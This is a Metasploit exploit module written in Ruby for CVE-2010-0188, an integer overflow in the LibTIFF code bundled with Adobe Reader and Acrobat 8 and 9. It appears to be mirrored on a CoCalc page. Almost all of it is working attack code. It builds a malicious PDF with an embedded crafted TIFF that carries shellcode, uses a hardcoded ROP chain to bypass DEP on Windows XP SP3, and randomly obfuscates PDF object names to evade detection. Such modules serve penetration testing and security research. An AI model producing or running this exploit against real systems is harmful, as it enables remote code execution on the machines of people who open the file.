CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'zlib'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = GoodRanking
10

11
  include Msf::Exploit::FILEFORMAT
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Adobe Acrobat Bundled LibTIFF Integer Overflow',
16
      'Description'    => %q{
17
        This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat
18
        Professional versions 8.0 through 8.2 and 9.0 through 9.3.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'Microsoft',                         # reported to Adobe
24
          'villy <villys777[at]gmail.com>',  # public exploit
25
          # Metasploit version by:
26
          'jduck'
27
        ],
28
      'References'     =>
29
        [
30
          [ 'CVE', '2010-0188' ],
31
          [ 'BID', '38195' ],
32
          [ 'OSVDB', '62526' ],
33
          [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-07.html' ],
34
          [ 'URL', 'http://web.archive.org/web/20100223002318/http://secunia.com:80/blog/76' ],
35
          [ 'URL', 'http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html' ]
36
        ],
37
      'DefaultOptions' =>
38
        {
39
          'EXITFUNC' => 'process',
40
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
41
          'DisablePayloadHandler' => true
42
        },
43
      'Payload'        =>
44
        {
45
          'Space'         => 1024,
46
          'BadChars'      => "\x00",
47
          'DisableNops'	 => true
48
        },
49
      'Platform'       => 'win',
50
      'Targets'        =>
51
        [
52
          # test results (on Windows XP SP3)
53
          # reader 6.0.1 - untested
54
          # reader 7.0.5 - untested
55
          # reader 7.0.8 - untested
56
          # reader 7.0.9 - untested
57
          # reader 7.1.0 - untested
58
          # reader 7.1.1 - untested
59
          # reader 8.0.0 - untested
60
          # reader 8.1.1 - untested
61
          # reader 8.1.2 - untested
62
          # reader 8.1.3 - untested
63
          # reader 8.1.4 - untested
64
          # reader 8.1.5 - untested
65
          # reader 8.1.6 - untested
66
          # reader 8.2.0 - untested
67
          # reader 9.0.0 - untested
68
          # reader 9.1.0 - untested
69
          # reader 9.2.0 - untested
70
          # reader 9.3.0 - works
71
          [ 'Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)',
72
            {
73
              # ew, hardcoded offsets - see make_tiff()
74
            }
75
          ],
76
        ],
77
      'DisclosureDate' => '2010-02-16',
78
      'DefaultTarget'  => 0))
79

80
    register_options(
81
      [
82
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
83
      ])
84

85
  end
86

87
  def exploit
88

89
    tiff_data = make_tiff(payload.encoded)
90
    xml_data = make_xml(tiff_data)
91
    compressed = Zlib::Deflate.deflate(xml_data)
92

93
    # Create the pdf
94
    pdf = make_pdf(compressed)
95

96
    print_status("Creating '#{datastore['FILENAME']}' file...")
97

98
    file_create(pdf)
99

100
  end
101

102

103
  def random_non_ascii_string(count)
104
    result = ""
105
    count.times do
106
      result << (rand(128) + 128).chr
107
    end
108
    result
109
  end
110

111
  def io_def(id)
112
    "%d 0 obj\r\n" % id
113
  end
114

115
  def io_ref(id)
116
    "%d 0 R" % id
117
  end
118

119

120
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
121
  def n_obfu(str)
122
    result = ""
123
    str.scan(/./u) do |c|
124
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
125
        result << "#%x" % c.unpack("C*")[0]
126
      else
127
        result << c
128
      end
129
    end
130
    result
131
  end
132

133

134
  def ascii_hex_whitespace_encode(str)
135
    result = ""
136
    whitespace = ""
137
    str.each_byte do |b|
138
      result << whitespace << "%02x" % b
139
      whitespace = " " * (rand(3) + 1)
140
    end
141
    result << ">"
142
  end
143

144

145
  def make_pdf(xml_data)
146

147
    xref = []
148
    eol = "\x0d\x0a"
149
    endobj = "endobj" << eol
150

151
    pdf = "%PDF-1.5" << eol
152
    pdf << "%" << random_non_ascii_string(4) << eol
153

154
    xref << pdf.length
155
    pdf << io_def(1) << n_obfu("<</Filter/FlateDecode/Length ") << xml_data.length.to_s << n_obfu("/Type /EmbeddedFile>>") << eol
156
    pdf << "stream" << eol
157
    pdf << xml_data << eol
158
    pdf << eol << "endstream" << eol
159
    pdf << endobj
160

161
    xref << pdf.length
162
    pdf << io_def(2) << n_obfu("<</V () /Kids [") << io_ref(3) << n_obfu("] /T (") << "topmostSubform[0]" << n_obfu(") >>") << eol << endobj
163

164
    xref << pdf.length
165
    pdf << io_def(3) << n_obfu("<</Parent ") << io_ref(2) << n_obfu(" /Kids [") << io_ref(4) << n_obfu("] /T (") << "Page1[0]" << n_obfu(")>>")
166
    pdf << eol << endobj
167

168
    xref << pdf.length
169
    pdf << io_def(4) << n_obfu("<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P ") << io_ref(5)
170
    pdf << n_obfu("/FT /Btn/TU (") << "ImageField1" << n_obfu(")/Ff 65536/Parent ") << io_ref(3)
171
    pdf << n_obfu("/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (") << "ImageField1[0]" << n_obfu(")/Rect [107.385 705.147 188.385 709.087]>>")
172
    pdf << eol << endobj
173

174
    xref << pdf.length
175
    pdf << io_def(5) << n_obfu("<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent ")
176
    pdf << io_ref(6) << n_obfu("/Type /Page/PieceInfo null>>")
177
    pdf << eol << endobj
178

179
    xref << pdf.length
180
    pdf << io_def(6) << n_obfu("<</Kids [") << io_ref(5) << n_obfu("]/Type /Pages/Count 1>>")
181
    pdf << eol << endobj
182

183
    xref << pdf.length
184
    pdf << io_def(7) << ("<</PageMode /UseAttachments/Pages ") << io_ref(6)
185
    pdf << ("/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm ") << io_ref(8)
186
    pdf << ("/Type /Catalog>>")
187
    pdf << eol << endobj
188

189
    xref << pdf.length
190
    pdf << io_def(8) << n_obfu("<</DA (/Helv 0 Tf 0 g )/XFA [(template) ") << io_ref(1) << n_obfu("]/Fields [")
191
    pdf << io_ref(2) << n_obfu("]>>")
192
    pdf << endobj << eol
193

194
    xrefPosition = pdf.length
195
    pdf << "xref" << eol
196
    pdf << "0 %d" % (xref.length + 1) << eol
197
    pdf << "0000000000 65535 f" << eol
198
    xref.each do |index|
199
      pdf << "%010d 00000 n" % index << eol
200
    end
201
    pdf << "trailer" << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(7) << ">>" << eol
202
    pdf << "startxref" << eol
203
    pdf << xrefPosition.to_s() << eol
204
    pdf << "%%EOF"
205

206
  end
207

208
  def make_tiff(code)
209
    tiff_offset = 0x2038
210
    shellcode_offset = 1500
211

212
    tiff =  "II*\x00"
213
    tiff << [tiff_offset].pack('V')
214
    tiff << make_nops(shellcode_offset)
215
    tiff << code
216

217
    # Padding
218
    tiff << rand_text_alphanumeric(tiff_offset - 8 - code.length - shellcode_offset)
219

220
    tiff << "\x07\x00\x00\x01\x03\x00\x01\x00"
221
    tiff << "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"
222
    tiff << "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"
223
    tiff << "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"
224
    tiff << "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"
225
    tiff << "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"
226
    tiff << "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00"
227

228
    # The following executes a ret2lib using BIB.dll
229
    # The effect is to bypass DEP and execute the shellcode in an indirect way
230
    stack_data = [
231
      0x70072f7,      # pop eax / ret
232
      0x10104,
233
      0x70015bb,      # pop ecx / ret
234
      0x1000,
235
      0x700154d,      # mov [eax], ecx / ret
236
      0x70015bb,      # pop ecx / ret
237
      0x7ffe0300,     # -- location of KiFastSystemCall
238
      0x7007fb2,      # mov eax, [ecx] / ret
239
      0x70015bb,      # pop ecx / ret
240
      0x10011,
241
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret
242
      0x70015bb,      # pop ecx / ret
243
      0x10100,
244
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret
245
      0x70072f7,      # pop eax / ret
246
      0x10011,
247
      0x70052e2,      # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
248
      0x7005c54,      # pop esi / add esp,0x14 / ret
249
      0xffffffff,
250
      0x10100,
251
      0x0,
252
      0x10104,
253
      0x1000,
254
      0x40,
255
      # The next bit effectively copies data from the interleaved stack to the memory
256
      # pointed to by eax
257
      # The data copied is:
258
      # \x5a\x52\x6a\x02\x58\xcd\x2e\x3c\xf4\x74\x5a\x05\xb8\x49\x49\x2a
259
      # \x00\x8b\xfa\xaf\x75\xea\x87\xfe\xeb\x0a\x5f\xb9\xe0\x03\x00\x00
260
      # \xf3\xa5\xeb\x09\xe8\xf1\xff\xff\xff\x90\x90\x90\xff\xff\xff\x90
261
      0x700d731,      # mov eax, [ebp-0x24] / ret
262
      0x70015bb,      # pop ecx / ret
263
      0x26a525a,
264
      0x700154d,      # mov [eax], ecx / ret
265
      0x700a722,      # add eax, 4 / ret
266
      0x70015bb,      # pop ecx / ret
267
      0x3c2ecd58,
268
      0x700154d,      # mov [eax], ecx / ret
269
      0x700a722,      # add eax, 4 / ret
270
      0x70015bb,      # pop ecx / ret
271
      0xf4745a05,
272
      0x700154d,      # mov [eax], ecx / ret
273
      0x700a722,      # add eax, 4 / ret
274
      0x70015bb,      # pop ecx / ret
275
      0x2a4949b8,
276
      0x700154d,      # mov [eax], ecx / ret
277
      0x700a722,      # add eax, 4 / ret
278
      0x70015bb,      # pop ecx / ret
279
      0xaffa8b00,
280
      0x700154d,      # mov [eax], ecx / ret
281
      0x700a722,      # add eax, 4 / ret
282
      0x70015bb,      # pop ecx / ret
283
      0xfe87ea75,
284
      0x700154d,      # mov [eax], ecx / ret
285
      0x700a722,      # add eax, 4 / ret
286
      0x70015bb,      # pop ecx / ret
287
      0xb95f0aeb,
288
      0x700154d,      # mov [eax], ecx / ret
289
      0x700a722,      # add eax, 4 / ret
290
      0x70015bb,      # pop ecx / ret
291
      0x3e0,
292
      0x700154d,      # mov [eax], ecx / ret
293
      0x700a722,      # add eax, 4 / ret
294
      0x70015bb,      # pop ecx / ret
295
      0x9eba5f3,
296
      0x700154d,      # mov [eax], ecx / ret
297
      0x700a722,      # add eax, 4 / ret
298
      0x70015bb,      # pop ecx / ret
299
      0xfffff1e8,
300
      0x700154d,      # mov [eax], ecx / ret
301
      0x700a722,      # add eax, 4 / ret
302
      0x70015bb,      # pop ecx / ret
303
      0x909090ff,
304
      0x700154d,      # mov [eax], ecx / ret
305
      0x700a722,      # add eax, 4 / ret
306
      0x70015bb,      # pop ecx / ret
307
      0x90ffffff,
308
      0x700154d,      # mov [eax], ecx / ret
309
      0x700d731,      # mov eax, [ebp-0x24] / ret
310
      0x700112f       # call eax -- (execute stub to transition to full shellcode)
311
    ].pack('V*')
312

313
    tiff << stack_data
314

315
    Rex::Text.encode_base64(tiff)
316
  end
317

318
  def make_xml(tiff_data)
319
    xml_data = <<-EOS
320
<?xml version="1.0" encoding="UTF-8" ?>
321
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
322
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
323
<present>
324
<pdf>
325
<version>1.65</version>
326
<interactive>1</interactive>
327
<linearized>1</linearized>
328
</pdf>
329
<xdp>
330
<packets>*</packets>
331
</xdp>
332
<destination>pdf</destination>
333
</present>
334
</config>
335
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
336
<subform name="topmostSubform" layout="tb" locale="en_US">
337
<pageSet>
338
<pageArea id="PageArea1" name="PageArea1">
339
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
340
<medium short="612pt" long="792pt" stock="custom" />
341
</pageArea>
342
</pageSet>
343
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
344
<break before="pageArea" beforeTarget="#PageArea1" />
345
<bind match="none" />
346
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
347
<ui>
348
<imageEdit />
349
</ui>
350
</field>
351
<?templateDesigner expand 1?>
352
</subform>
353
<?templateDesigner expand 1?>
354
</subform>
355
<?templateDesigner FormTargetVersion 24?>
356
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
357
<?templateDesigner Zoom 94?>
358
</template>
359
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
360
<xfa:data>
361
<topmostSubform>
362
<ImageField1 xfa:contentType="image/tif" href="">REPLACE_TIFF</ImageField1>
363
</topmostSubform>
364
</xfa:data>
365
</xfa:datasets>
366
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
367
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
368
<subform name="topmostSubform">
369
<instanceManager name="_Page1" />
370
<subform name="Page1">
371
<field name="ImageField1" />
372
</subform>
373
<pageSet>
374
<pageArea name="PageArea1" />
375
</pageSet>
376
</subform>
377
</form>
378
</xdp:xdp>
379
EOS
380
    xml_data.gsub!(/REPLACE_TIFF/, tiff_data)
381

382
    xml_data
383
  end
384
end
385

386